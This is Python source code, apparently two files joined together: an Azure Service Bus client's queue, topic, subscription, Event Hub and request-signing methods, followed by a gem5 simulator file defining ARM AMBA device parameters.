Retrieves an existing queue.
queue_name:
Name of the queue.
'''
_validate_not_none('queue_name', queue_name)
request = HTTPRequest()
request.method = 'GET'
request.host = self._get_host()
request.path = '/' + _str(queue_name) + ''
request.path, request.query = _update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
response = self._perform_request(request)
return _convert_response_to_queue(response)
def list_queues(self):
'''
Enumerates the queues in the service namespace.
'''
request = HTTPRequest()
request.method = 'GET'
request.host = self._get_host()
request.path = '/$Resources/Queues'
request.path, request.query = _update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
response = self._perform_request(request)
return _ETreeXmlToObject.convert_response_to_feeds(
response, _convert_etree_element_to_queue)
def create_topic(self, topic_name, topic=None, fail_on_exist=False):
'''
Creates a new topic. Once created, this topic resource manifest is
immutable.
topic_name:
Name of the topic to create.
topic:
Topic object to create.
fail_on_exist:
Specify whether to throw an exception when the topic exists.
'''
_validate_not_none('topic_name', topic_name)
request = HTTPRequest()
request.method = 'PUT'
request.host = self._get_host()
request.path = '/' + _str(topic_name) + ''
request.body = _get_request_body(_convert_topic_to_xml(topic))
request.path, request.query = _update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
if not fail_on_exist:
try:
self._perform_request(request)
return True
except WindowsAzureError as ex:
_dont_fail_on_exist(ex)
return False
else:
self._perform_request(request)
return True
def delete_topic(self, topic_name, fail_not_exist=False):
'''
Deletes an existing topic. This operation will also remove all
associated state including associated subscriptions.
topic_name:
Name of the topic to delete.
fail_not_exist:
Specify whether throw exception when topic doesn't exist.
'''
_validate_not_none('topic_name', topic_name)
request = HTTPRequest()
request.method = 'DELETE'
request.host = self._get_host()
request.path = '/' + _str(topic_name) + ''
request.path, request.query = _update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
if not fail_not_exist:
try:
self._perform_request(request)
return True
except WindowsAzureError as ex:
_dont_fail_not_exist(ex)
return False
else:
self._perform_request(request)
return True
def get_topic(self, topic_name):
'''
Retrieves the description for the specified topic.
topic_name:
Name of the topic.
'''
_validate_not_none('topic_name', topic_name)
request = HTTPRequest()
request.method = 'GET'
request.host = self._get_host()
request.path = '/' + _str(topic_name) + ''
request.path, request.query = _update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
response = self._perform_request(request)
return _convert_response_to_topic(response)
def list_topics(self):
'''
Retrieves the topics in the service namespace.
'''
request = HTTPRequest()
request.method = 'GET'
request.host = self._get_host()
request.path = '/$Resources/Topics'
request.path, request.query = _update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
response = self._perform_request(request)
return _ETreeXmlToObject.convert_response_to_feeds(
response, _convert_etree_element_to_topic)
def create_rule(self, topic_name, subscription_name, rule_name, rule=None,
fail_on_exist=False):
'''
Creates a new rule. Once created, this rule's resource manifest is
immutable.
topic_name:
Name of the topic.
subscription_name:
Name of the subscription.
rule_name:
Name of the rule.
fail_on_exist:
Specify whether to throw an exception when the rule exists.
'''
_validate_not_none('topic_name', topic_name)
_validate_not_none('subscription_name', subscription_name)
_validate_not_none('rule_name', rule_name)
request = HTTPRequest()
request.method = 'PUT'
request.host = self._get_host()
request.path = '/' + _str(topic_name) + '/subscriptions/' + \
_str(subscription_name) + \
'/rules/' + _str(rule_name) + ''
request.body = _get_request_body(_convert_rule_to_xml(rule))
request.path, request.query = _update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
if not fail_on_exist:
try:
self._perform_request(request)
return True
except WindowsAzureError as ex:
_dont_fail_on_exist(ex)
return False
else:
self._perform_request(request)
return True
def delete_rule(self, topic_name, subscription_name, rule_name,
fail_not_exist=False):
'''
Deletes an existing rule.
topic_name:
Name of the topic.
subscription_name:
Name of the subscription.
rule_name:
Name of the rule to delete. DEFAULT_RULE_NAME=$Default.
Use DEFAULT_RULE_NAME to delete default rule for the subscription.
fail_not_exist:
Specify whether throw exception when rule doesn't exist.
'''
_validate_not_none('topic_name', topic_name)
_validate_not_none('subscription_name', subscription_name)
_validate_not_none('rule_name', rule_name)
request = HTTPRequest()
request.method = 'DELETE'
request.host = self._get_host()
request.path = '/' + _str(topic_name) + '/subscriptions/' + \
_str(subscription_name) + \
'/rules/' + _str(rule_name) + ''
request.path, request.query = _update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
if not fail_not_exist:
try:
self._perform_request(request)
return True
except WindowsAzureError as ex:
_dont_fail_not_exist(ex)
return False
else:
self._perform_request(request)
return True
def get_rule(self, topic_name, subscription_name, rule_name):
'''
Retrieves the description for the specified rule.
topic_name:
Name of the topic.
subscription_name:
Name of the subscription.
rule_name:
Name of the rule.
'''
_validate_not_none('topic_name', topic_name)
_validate_not_none('subscription_name', subscription_name)
_validate_not_none('rule_name', rule_name)
request = HTTPRequest()
request.method = 'GET'
request.host = self._get_host()
request.path = '/' + _str(topic_name) + '/subscriptions/' + \
_str(subscription_name) + \
'/rules/' + _str(rule_name) + ''
request.path, request.query = _update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
response = self._perform_request(request)
return _convert_response_to_rule(response)
def list_rules(self, topic_name, subscription_name):
'''
Retrieves the rules that exist under the specified subscription.
topic_name:
Name of the topic.
subscription_name:
Name of the subscription.
'''
_validate_not_none('topic_name', topic_name)
_validate_not_none('subscription_name', subscription_name)
request = HTTPRequest()
request.method = 'GET'
request.host = self._get_host()
request.path = '/' + \
_str(topic_name) + '/subscriptions/' + \
_str(subscription_name) + '/rules/'
request.path, request.query = _update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
response = self._perform_request(request)
return _ETreeXmlToObject.convert_response_to_feeds(
response, _convert_etree_element_to_rule)
def create_subscription(self, topic_name, subscription_name,
subscription=None, fail_on_exist=False):
'''
Creates a new subscription. Once created, this subscription resource
manifest is immutable.
topic_name:
Name of the topic.
subscription_name:
Name of the subscription.
fail_on_exist:
Specify whether throw exception when subscription exists.
'''
_validate_not_none('topic_name', topic_name)
_validate_not_none('subscription_name', subscription_name)
request = HTTPRequest()
request.method = 'PUT'
request.host = self._get_host()
request.path = '/' + \
_str(topic_name) + '/subscriptions/' + _str(subscription_name) + ''
request.body = _get_request_body(
_convert_subscription_to_xml(subscription))
request.path, request.query = _update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
if not fail_on_exist:
try:
self._perform_request(request)
return True
except WindowsAzureError as ex:
_dont_fail_on_exist(ex)
return False
else:
self._perform_request(request)
return True
def delete_subscription(self, topic_name, subscription_name,
fail_not_exist=False):
'''
Deletes an existing subscription.
topic_name:
Name of the topic.
subscription_name:
Name of the subscription to delete.
fail_not_exist:
Specify whether to throw an exception when the subscription
doesn't exist.
'''
_validate_not_none('topic_name', topic_name)
_validate_not_none('subscription_name', subscription_name)
request = HTTPRequest()
request.method = 'DELETE'
request.host = self._get_host()
request.path = '/' + \
_str(topic_name) + '/subscriptions/' + _str(subscription_name) + ''
request.path, request.query = _update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
if not fail_not_exist:
try:
self._perform_request(request)
return True
except WindowsAzureError as ex:
_dont_fail_not_exist(ex)
return False
else:
self._perform_request(request)
return True
def get_subscription(self, topic_name, subscription_name):
'''
Gets an existing subscription.
topic_name:
Name of the topic.
subscription_name:
Name of the subscription.
'''
_validate_not_none('topic_name', topic_name)
_validate_not_none('subscription_name', subscription_name)
request = HTTPRequest()
request.method = 'GET'
request.host = self._get_host()
request.path = '/' + \
_str(topic_name) + '/subscriptions/' + _str(subscription_name) + ''
request.path, request.query = _update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
response = self._perform_request(request)
return _convert_response_to_subscription(response)
def list_subscriptions(self, topic_name):
'''
Retrieves the subscriptions in the specified topic.
topic_name:
Name of the topic.
'''
_validate_not_none('topic_name', topic_name)
request = HTTPRequest()
request.method = 'GET'
request.host = self._get_host()
request.path = '/' + _str(topic_name) + '/subscriptions/'
request.path, request.query = _update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
response = self._perform_request(request)
return _ETreeXmlToObject.convert_response_to_feeds(
response, _convert_etree_element_to_subscription)
def send_topic_message(self, topic_name, message=None):
'''
Enqueues a message into the specified topic. The limit to the number
of messages which may be present in the topic is governed by the
message size in MaxTopicSizeInBytes. If this message causes the topic
to exceed its quota, a quota exceeded error is returned and the
message will be rejected.
topic_name:
Name of the topic.
message:
Message object containing message body and properties.
'''
_validate_not_none('topic_name', topic_name)
_validate_not_none('message', message)
request = HTTPRequest()
request.method = 'POST'
request.host = self._get_host()
request.path = '/' + _str(topic_name) + '/messages'
request.headers = message.add_headers(request)
request.body = _get_request_body_bytes_only(
'message.body', message.body)
request.path, request.query = _update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
self._perform_request(request)
def peek_lock_subscription_message(self, topic_name, subscription_name,
timeout='60'):
'''
This operation is used to atomically retrieve and lock a message for
processing. The message is guaranteed not to be delivered to other
receivers during the lock duration period specified in buffer
description. Once the lock expires, the message will be available to
other receivers (on the same subscription only) during the lock
duration period specified in the topic description. Once the lock
expires, the message will be available to other receivers. In order to
complete processing of the message, the receiver should issue a delete
command with the lock ID received from this operation. To abandon
processing of the message and unlock it for other receivers, an Unlock
Message command should be issued, or the lock duration period can
expire.
topic_name:
Name of the topic.
subscription_name:
Name of the subscription.
timeout:
Optional. The timeout parameter is expressed in seconds.
'''
_validate_not_none('topic_name', topic_name)
_validate_not_none('subscription_name', subscription_name)
request = HTTPRequest()
request.method = 'POST'
request.host = self._get_host()
request.path = '/' + \
_str(topic_name) + '/subscriptions/' + \
_str(subscription_name) + '/messages/head'
request.query = [('timeout', _int_or_none(timeout))]
request.path, request.query = _update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
response = self._perform_request(request)
return _create_message(response, self)
def unlock_subscription_message(self, topic_name, subscription_name,
sequence_number, lock_token):
'''
Unlock a message for processing by other receivers on a given
subscription. This operation deletes the lock object, causing the
message to be unlocked. A message must have first been locked by a
receiver before this operation is called.
topic_name:
Name of the topic.
subscription_name:
Name of the subscription.
sequence_number:
The sequence number of the message to be unlocked as returned in
BrokerProperties['SequenceNumber'] by the Peek Message operation.
lock_token:
The ID of the lock as returned by the Peek Message operation in
BrokerProperties['LockToken']
'''
_validate_not_none('topic_name', topic_name)
_validate_not_none('subscription_name', subscription_name)
_validate_not_none('sequence_number', sequence_number)
_validate_not_none('lock_token', lock_token)
request = HTTPRequest()
request.method = 'PUT'
request.host = self._get_host()
request.path = '/' + _str(topic_name) + \
'/subscriptions/' + str(subscription_name) + \
'/messages/' + _str(sequence_number) + \
'/' + _str(lock_token) + ''
request.path, request.query = _update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
self._perform_request(request)
def read_delete_subscription_message(self, topic_name, subscription_name,
timeout='60'):
'''
Read and delete a message from a subscription as an atomic operation.
This operation should be used when a best-effort guarantee is
sufficient for an application; that is, using this operation it is
possible for messages to be lost if processing fails.
topic_name:
Name of the topic.
subscription_name:
Name of the subscription.
timeout:
Optional. The timeout parameter is expressed in seconds.
'''
_validate_not_none('topic_name', topic_name)
_validate_not_none('subscription_name', subscription_name)
request = HTTPRequest()
request.method = 'DELETE'
request.host = self._get_host()
request.path = '/' + _str(topic_name) + \
'/subscriptions/' + _str(subscription_name) + \
'/messages/head'
request.query = [('timeout', _int_or_none(timeout))]
request.path, request.query = _update_request_uri_query(request)
request.headers = self._update_service_bus_header(request)
response = self._perform_request(request)
return _create_message(response, self)
def delete_subscription_message(self, topic_name, subscription_name,
                                sequence_number, lock_token):
    '''
    Completes processing of a locked message and deletes it from the
    subscription. Call this only after successfully processing a
    previously locked message, to maintain At-Least-Once delivery
    assurances.

    topic_name:
        Name of the topic.
    subscription_name:
        Name of the subscription.
    sequence_number:
        Sequence number of the message to delete, as returned in
        BrokerProperties['SequenceNumber'] by the Peek Message operation.
    lock_token:
        ID of the lock, as returned by the Peek Message operation in
        BrokerProperties['LockToken'].
    '''
    # Validate all required arguments before building the request.
    for name, value in (('topic_name', topic_name),
                        ('subscription_name', subscription_name),
                        ('sequence_number', sequence_number),
                        ('lock_token', lock_token)):
        _validate_not_none(name, value)
    req = HTTPRequest()
    req.method = 'DELETE'
    req.host = self._get_host()
    req.path = ('/' + _str(topic_name) +
                '/subscriptions/' + _str(subscription_name) +
                '/messages/' + _str(sequence_number) +
                '/' + _str(lock_token))
    req.path, req.query = _update_request_uri_query(req)
    req.headers = self._update_service_bus_header(req)
    self._perform_request(req)
def send_queue_message(self, queue_name, message=None):
    '''
    Sends a message into the specified queue. The number of messages the
    queue may hold is governed by the maximum size setting
    (MaxTopicSizeInMegaBytes); if this message would push the queue over
    its quota, a quota exceeded error is returned and the message is
    rejected.

    queue_name:
        Name of the queue.
    message:
        Message object containing message body and properties.
    '''
    _validate_not_none('queue_name', queue_name)
    _validate_not_none('message', message)
    req = HTTPRequest()
    req.method = 'POST'
    req.host = self._get_host()
    req.path = '/' + _str(queue_name) + '/messages'
    # Message broker/custom properties are carried as HTTP headers.
    req.headers = message.add_headers(req)
    req.body = _get_request_body_bytes_only('message.body',
                                            message.body)
    req.path, req.query = _update_request_uri_query(req)
    req.headers = self._update_service_bus_header(req)
    self._perform_request(req)
def peek_lock_queue_message(self, queue_name, timeout='60'):
    '''
    Atomically retrieves and locks a message from a queue for processing.
    The message is guaranteed not to be delivered to other receivers (on
    the same subscription only) during the lock duration period specified
    in the queue description. Once the lock expires, the message becomes
    available to other receivers again. To complete processing, the
    receiver should issue a delete command with the lock ID received from
    this operation; to abandon processing and unlock the message for
    other receivers, issue an Unlock Message command (or let the lock
    duration expire).

    queue_name:
        Name of the queue.
    timeout:
        Optional. The timeout parameter is expressed in seconds.
    '''
    _validate_not_none('queue_name', queue_name)
    req = HTTPRequest()
    req.method = 'POST'
    req.host = self._get_host()
    req.path = '/' + _str(queue_name) + '/messages/head'
    req.query = [('timeout', _int_or_none(timeout))]
    req.path, req.query = _update_request_uri_query(req)
    req.headers = self._update_service_bus_header(req)
    response = self._perform_request(req)
    return _create_message(response, self)
def unlock_queue_message(self, queue_name, sequence_number, lock_token):
    '''
    Unlocks a message for processing by other receivers. Deletes the
    lock object, causing the message to be unlocked; a message must
    first have been locked by a receiver before this operation is
    called.

    queue_name:
        Name of the queue.
    sequence_number:
        Sequence number of the message to unlock, as returned in
        BrokerProperties['SequenceNumber'] by the Peek Message operation.
    lock_token:
        ID of the lock, as returned by the Peek Message operation in
        BrokerProperties['LockToken'].
    '''
    # Validate all required arguments before building the request.
    for name, value in (('queue_name', queue_name),
                        ('sequence_number', sequence_number),
                        ('lock_token', lock_token)):
        _validate_not_none(name, value)
    req = HTTPRequest()
    req.method = 'PUT'
    req.host = self._get_host()
    req.path = ('/' + _str(queue_name) +
                '/messages/' + _str(sequence_number) +
                '/' + _str(lock_token))
    req.path, req.query = _update_request_uri_query(req)
    req.headers = self._update_service_bus_header(req)
    self._perform_request(req)
def read_delete_queue_message(self, queue_name, timeout='60'):
    '''
    Reads and deletes a message from a queue as a single atomic
    operation. Use this when a best-effort guarantee is sufficient for
    the application; if processing fails after the read, the message is
    lost.

    queue_name:
        Name of the queue.
    timeout:
        Optional. The timeout parameter is expressed in seconds.
    '''
    _validate_not_none('queue_name', queue_name)
    req = HTTPRequest()
    req.method = 'DELETE'
    req.host = self._get_host()
    req.path = '/' + _str(queue_name) + '/messages/head'
    req.query = [('timeout', _int_or_none(timeout))]
    req.path, req.query = _update_request_uri_query(req)
    req.headers = self._update_service_bus_header(req)
    response = self._perform_request(req)
    return _create_message(response, self)
def delete_queue_message(self, queue_name, sequence_number, lock_token):
    '''
    Completes processing of a locked message and deletes it from the
    queue. Call this only after successfully processing a previously
    locked message, to maintain At-Least-Once delivery assurances.

    queue_name:
        Name of the queue.
    sequence_number:
        Sequence number of the message to delete, as returned in
        BrokerProperties['SequenceNumber'] by the Peek Message operation.
    lock_token:
        ID of the lock, as returned by the Peek Message operation in
        BrokerProperties['LockToken'].
    '''
    # Validate all required arguments before building the request.
    for name, value in (('queue_name', queue_name),
                        ('sequence_number', sequence_number),
                        ('lock_token', lock_token)):
        _validate_not_none(name, value)
    req = HTTPRequest()
    req.method = 'DELETE'
    req.host = self._get_host()
    req.path = ('/' + _str(queue_name) +
                '/messages/' + _str(sequence_number) +
                '/' + _str(lock_token))
    req.path, req.query = _update_request_uri_query(req)
    req.headers = self._update_service_bus_header(req)
    self._perform_request(req)
def receive_queue_message(self, queue_name, peek_lock=True, timeout=60):
    '''
    Receive a message from a queue for processing.

    queue_name:
        Name of the queue.
    peek_lock:
        Optional. True to retrieve and lock the message. False to read
        and delete the message. Default is True (lock).
    timeout:
        Optional. The timeout parameter is expressed in seconds.
    '''
    # Dispatch to the locking or the destructive-read variant.
    receiver = (self.peek_lock_queue_message if peek_lock
                else self.read_delete_queue_message)
    return receiver(queue_name, timeout)
def receive_subscription_message(self, topic_name, subscription_name,
                                 peek_lock=True, timeout=60):
    '''
    Receive a message from a subscription for processing.

    topic_name:
        Name of the topic.
    subscription_name:
        Name of the subscription.
    peek_lock:
        Optional. True to retrieve and lock the message. False to read
        and delete the message. Default is True (lock).
    timeout:
        Optional. The timeout parameter is expressed in seconds.
    '''
    # Dispatch to the locking or the destructive-read variant.
    receiver = (self.peek_lock_subscription_message if peek_lock
                else self.read_delete_subscription_message)
    return receiver(topic_name, subscription_name, timeout)
def create_event_hub(self, hub_name, hub=None, fail_on_exist=False):
    '''
    Creates a new Event Hub.

    hub_name:
        Name of event hub.
    hub:
        Optional. Event hub properties. Instance of EventHub class.
        Relevant fields: message_retention_in_days (days to retain
        events), status (enabled or disabled), user_metadata, and
        partition_count (number of shards on the Event Hub).
    fail_on_exist:
        Specify whether to throw an exception when the event hub exists.
    '''
    _validate_not_none('hub_name', hub_name)
    req = HTTPRequest()
    req.method = 'PUT'
    req.host = self._get_host()
    req.path = '/' + _str(hub_name) + '?api-version=2014-01'
    req.body = _get_request_body(_convert_event_hub_to_xml(hub))
    req.path, req.query = _update_request_uri_query(req)
    req.headers = self._update_service_bus_header(req)
    if fail_on_exist:
        # Let any conflict error propagate to the caller.
        self._perform_request(req)
        return True
    try:
        self._perform_request(req)
    except WindowsAzureError as ex:
        # Swallow "already exists"; re-raise anything else.
        _dont_fail_on_exist(ex)
        return False
    return True
def update_event_hub(self, hub_name, hub=None):
    '''
    Updates an Event Hub.

    hub_name:
        Name of event hub.
    hub:
        Optional. Event hub properties. Instance of EventHub class.
        Relevant field: message_retention_in_days (days to retain
        events for this Event Hub).
    '''
    _validate_not_none('hub_name', hub_name)
    req = HTTPRequest()
    req.method = 'PUT'
    req.host = self._get_host()
    req.path = '/' + _str(hub_name) + '?api-version=2014-01'
    req.body = _get_request_body(_convert_event_hub_to_xml(hub))
    req.path, req.query = _update_request_uri_query(req)
    # Unconditional update: If-Match '*' matches any existing entity.
    # Must be appended before the service-bus headers are finalized.
    req.headers.append(('If-Match', '*'))
    req.headers = self._update_service_bus_header(req)
    response = self._perform_request(req)
    return _convert_response_to_event_hub(response)
def delete_event_hub(self, hub_name, fail_not_exist=False):
    '''
    Deletes an Event Hub. This operation also removes all associated
    state.

    hub_name:
        Name of the event hub to delete.
    fail_not_exist:
        Specify whether to throw an exception if the event hub doesn't
        exist.
    '''
    _validate_not_none('hub_name', hub_name)
    req = HTTPRequest()
    req.method = 'DELETE'
    req.host = self._get_host()
    req.path = '/' + _str(hub_name) + '?api-version=2014-01'
    req.path, req.query = _update_request_uri_query(req)
    req.headers = self._update_service_bus_header(req)
    if fail_not_exist:
        # Let any "not found" error propagate to the caller.
        self._perform_request(req)
        return True
    try:
        self._perform_request(req)
    except WindowsAzureError as ex:
        # Swallow "does not exist"; re-raise anything else.
        _dont_fail_not_exist(ex)
        return False
    return True
def get_event_hub(self, hub_name):
    '''
    Retrieves an existing event hub.

    hub_name:
        Name of the event hub.
    '''
    _validate_not_none('hub_name', hub_name)
    req = HTTPRequest()
    req.method = 'GET'
    req.host = self._get_host()
    req.path = '/' + _str(hub_name)
    req.path, req.query = _update_request_uri_query(req)
    req.headers = self._update_service_bus_header(req)
    response = self._perform_request(req)
    return _convert_response_to_event_hub(response)
def send_event(self, hub_name, message, device_id=None,
               broker_properties=None):
    '''
    Sends a new message event to an Event Hub.

    hub_name:
        Name of the event hub.
    message:
        The event body to post.
    device_id:
        Optional. When given, the event is posted via that publisher's
        endpoint.
    broker_properties:
        Optional. Extra broker properties, sent as a header.
    '''
    _validate_not_none('hub_name', hub_name)
    req = HTTPRequest()
    req.method = 'POST'
    req.host = self._get_host()
    if device_id:
        req.path = '/{0}/publishers/{1}/messages?api-version=2014-01'.format(hub_name, device_id)
    else:
        req.path = '/{0}/messages?api-version=2014-01'.format(hub_name)
    if broker_properties:
        req.headers.append(
            ('BrokerProperties', str(broker_properties)))
    req.body = _get_request_body(message)
    req.path, req.query = _update_request_uri_query(req)
    req.headers = self._update_service_bus_header(req)
    self._perform_request(req)
def _get_host(self):
return self.service_namespace + self.host_base
def _perform_request(self, request):
    # Send the request through the HTTP filter chain; translate an
    # HTTPError into the service-bus-specific error via the shared
    # handler (which is expected to raise or return an error object).
    try:
        resp = self._filter(request)
    except HTTPError as ex:
        return _service_bus_error_handler(ex)

    return resp
def _update_service_bus_header(self, request):
''' Add additional headers for service bus. '''
if request.method in ['PUT', 'POST', 'MERGE', 'DELETE']:
request.headers.append(('Content-Length', str(len(request.body))))
# if it is not GET or HEAD request, must set content-type.
if not request.method in ['GET', 'HEAD']:
for name, _ in request.headers:
if 'content-type' == name.lower():
break
else:
request.headers.append(
('Content-Type',
'application/atom+xml;type=entry;charset=utf-8'))
# Adds authorization header for authentication.
self.authentication.sign_request(request, self._httpclient)
return request.headers
# Token cache for Authentication.
# Shared by the different instances of ServiceBusWrapTokenAuthentication;
# maps a wrap_scope string to the most recently fetched WRAP token.
_tokens = {}
class ServiceBusWrapTokenAuthentication:
    '''Signs Service Bus requests with WRAP (ACS) access tokens.

    Tokens are fetched from the access control service and cached in the
    module-level ``_tokens`` dict, keyed by a per-resource scope string.
    '''

    def __init__(self, account_key, issuer):
        # ACS credentials used when requesting a new token.
        self.account_key = account_key
        self.issuer = issuer

    def sign_request(self, request, httpclient):
        # Attach the WRAP token as the Authorization header.
        request.headers.append(
            ('Authorization', self._get_authorization(request, httpclient)))

    def _get_authorization(self, request, httpclient):
        ''' return the signed string with token. '''
        return 'WRAP access_token="' + \
            self._get_token(request.host, request.path, httpclient) + '"'

    def _token_is_expired(self, token):
        ''' Check if token expires or not. '''
        # The token embeds its expiry as '...ExpiresOn=<epoch-seconds>&...'.
        time_pos_begin = token.find('ExpiresOn=') + len('ExpiresOn=')
        time_pos_end = token.find('&', time_pos_begin)
        token_expire_time = int(token[time_pos_begin:time_pos_end])
        time_now = time.mktime(time.localtime())

        # Adding 30 seconds so the token wouldn't be expired when we send the
        # token to server.
        return (token_expire_time - time_now) < 30

    def _get_token(self, host, path, httpclient):
        '''
        Returns token for the request.

        host:
            the service bus service request.
        path:
            the service bus service request.
        '''
        wrap_scope = 'http://' + host + path + self.issuer + self.account_key

        # Check whether has unexpired cache, return cached token if it is still
        # usable.
        if wrap_scope in _tokens:
            token = _tokens[wrap_scope]
            if not self._token_is_expired(token):
                return token

        # get token from accessconstrol server
        request = HTTPRequest()
        request.protocol_override = 'https'
        # The ACS endpoint lives on the '-sb.accesscontrol.' host.
        request.host = host.replace('.servicebus.', '-sb.accesscontrol.')
        request.method = 'POST'
        request.path = '/WRAPv0.9'
        request.body = ('wrap_name=' + url_quote(self.issuer) +
                        '&wrap_password=' + url_quote(self.account_key) +
                        '&wrap_scope=' +
                        url_quote('http://' + host + path)).encode('utf-8')
        request.headers.append(('Content-Length', str(len(request.body))))
        resp = httpclient.perform_request(request)

        token = resp.body.decode('utf-8-sig')
        # Extract the token value: between the first '=' and the last '&'.
        token = url_unquote(token[token.find('=') + 1:token.rfind('&')])
        _tokens[wrap_scope] = token

        return token
class ServiceBusSASAuthentication:
    '''Signs Service Bus requests with a Shared Access Signature (SAS).'''

    def __init__(self, key_name, key_value):
        # Name and value of the shared access policy key.
        self.key_name = key_name
        self.key_value = key_value

    def sign_request(self, request, httpclient):
        auth = self._get_authorization(request, httpclient)
        request.headers.append(('Authorization', auth))

    def _get_authorization(self, request, httpclient):
        # The string-to-sign is the lower-cased, fully quoted request URI
        # plus the expiry timestamp, separated by a newline.
        uri = url_quote(httpclient.get_uri(request), '').lower()
        expiry = str(self._get_expiry())
        signature = url_quote(
            _sign_string(self.key_value, uri + '\n' + expiry, False), '')
        auth_format = 'SharedAccessSignature sig={0}&se={1}&skn={2}&sr={3}'
        return auth_format.format(signature, expiry, self.key_name, uri)

    def _get_expiry(self):
        '''Returns the UTC datetime, in seconds since Epoch, when this signed
        request expires (5 minutes from now).'''
        return int(round(time.time() + 300))
|
|
# Copyright (c) 2009-2014 ARM Limited
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Copyright (c) 2006-2007 The Regents of The University of Michigan
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Ali Saidi
# Gabe Black
# William Wang
from m5.params import *
from m5.proxy import *
from Device import BasicPioDevice, PioDevice, IsaFake, BadAddr, DmaDevice
from Pci import PciConfigAll
from Ethernet import NSGigE, IGbE_igb, IGbE_e1000
from Ide import *
from Platform import Platform
from Terminal import Terminal
from Uart import Uart
from SimpleMemory import SimpleMemory
from Gic import *
from EnergyCtrl import EnergyCtrl
class AmbaPioDevice(BasicPioDevice):
    '''Abstract base for memory-mapped (PIO) AMBA peripherals.'''
    type = 'AmbaPioDevice'
    abstract = True
    cxx_header = "dev/arm/amba_device.hh"
    # Peripheral ID the kernel reads to identify/probe the device.
    amba_id = Param.UInt32("ID of AMBA device for kernel detection")
class AmbaIntDevice(AmbaPioDevice):
    '''Abstract AMBA PIO device that can raise an interrupt via the GIC.'''
    type = 'AmbaIntDevice'
    abstract = True
    cxx_header = "dev/arm/amba_device.hh"
    gic = Param.BaseGic(Parent.any, "Gic to use for interrupting")
    int_num = Param.UInt32("Interrupt number that connects to GIC")
    # Models the latency between the device action and interrupt delivery.
    int_delay = Param.Latency("100ns",
            "Time between action and interrupt generation by device")
class AmbaDmaDevice(DmaDevice):
    '''Abstract base for DMA-capable AMBA devices with a PIO slave port.'''
    type = 'AmbaDmaDevice'
    abstract = True
    cxx_header = "dev/arm/amba_device.hh"
    pio_addr = Param.Addr("Address for AMBA slave interface")
    pio_latency = Param.Latency("10ns", "Time between action and write/read result by AMBA DMA Device")
    gic = Param.BaseGic(Parent.any, "Gic to use for interrupting")
    int_num = Param.UInt32("Interrupt number that connects to GIC")
    # Peripheral ID the kernel reads to identify/probe the device.
    amba_id = Param.UInt32("ID of AMBA device for kernel detection")
class A9SCU(BasicPioDevice):
    '''Cortex-A9 Snoop Control Unit (SCU) register block.'''
    type = 'A9SCU'
    cxx_header = "dev/arm/a9scu.hh"
class RealViewCtrl(BasicPioDevice):
    '''RealView system controller (SYS_* registers).'''
    type = 'RealViewCtrl'
    cxx_header = "dev/arm/rv_ctrl.hh"
    proc_id0 = Param.UInt32(0x0C000000, "Processor ID, SYS_PROCID")
    proc_id1 = Param.UInt32(0x0C000222, "Processor ID, SYS_PROCID1")
    idreg = Param.UInt32(0x00000000, "ID Register, SYS_ID")
class VGic(PioDevice):
    '''Virtual Generic Interrupt Controller (GIC virtualization extension).'''
    type = 'VGic'
    cxx_header = "dev/arm/vgic.hh"
    gic = Param.BaseGic(Parent.any, "Gic to use for interrupting")
    platform = Param.Platform(Parent.any, "Platform this device is part of.")
    vcpu_addr = Param.Addr(0, "Address for vcpu interfaces")
    hv_addr = Param.Addr(0, "Address for hv control")
    pio_delay = Param.Latency('10ns', "Delay for PIO r/w")
    # The number of list registers is not currently configurable at runtime.
    ppint = Param.UInt32("HV maintenance interrupt number")
class AmbaFake(AmbaPioDevice):
    '''Placeholder AMBA device: decodes accesses but implements no
    functionality (an IsaFake with an AMBA peripheral ID).'''
    type = 'AmbaFake'
    cxx_header = "dev/arm/amba_fake.hh"
